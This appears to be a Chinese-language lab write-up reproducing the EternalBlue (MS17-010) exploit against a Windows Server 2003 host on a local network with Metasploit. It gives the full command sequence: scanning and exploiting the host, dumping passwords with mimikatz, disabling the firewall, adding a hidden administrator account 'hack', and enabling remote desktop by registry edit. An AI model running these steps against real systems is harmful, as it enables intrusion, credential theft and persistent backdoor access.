永恒之蓝——Windows server 2003 漏洞复现

Source

复现漏洞

靶机:Windows server 2003 IP:192.168.64.129

攻击机:kali 2021

1.在kali中启动msf模块

在控制台输入:msfconsole,或者在文件的漏洞利用工具集中双击metasploit framework进入msf。

 进入后页面如下,图像为随机图像,如若与上图不符合实属正常现象。

2.搜索ms17_010:search ms17_010

 3.使用命令:use auxiliary/scanner/smb/smb_ms17_010

 4.show options 输入options来获得帮助命令。

RHOSTS和THREADS,RHOSTS是要扫描的主机(主机段),THREADS是线程,默认是1,开始使用线程加快扫描。

 5.set rhosts 192.168.64.129 扫描靶机(windows 2003 )并输入run或者exploit攻击。

 出现上述的情况表明存在漏洞,即445端口开放。

漏洞利用

1.启动windows2003攻击模块

输入命令:use exploit/windows/smb/ms17_010_psexec

 2.输入run或者exploit开始攻击

 攻击成功后出现如上页面。接下来可以使用kali操控靶机。

kali操作靶机

1.获取屏幕截图

直接输入screenshot即可获得屏幕截图。

 2.获取密码

输入load mimikatz,然后再输入wdigest。即可获得

3.shell控制

  • 首先关闭靶机防火墙

        netsh firewall set opmode mode=disable

         查看防护墙状态:netsh firewall show state

  •  添加用户:net user hack 123 /add

         查看靶机用户:net user

  •  给已添加的用户做提权处理:net localgroup Administrators hack /add

         可以输入net user确认是否提升为管理员权限。

  • 查看端口靶机端口开放情况。netstat -ano

        如果3389端口没有开放,可以输入命令REG ADD HKLM\SYSTEM\CurrentControlSet\         Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f 开启。

        查看3389端口:netstat -aon | findstr "3389"

  • 远程操控靶机:在控制面板输入rdesktop ip即可,我的主机即输入rdesktop 192.168.64.129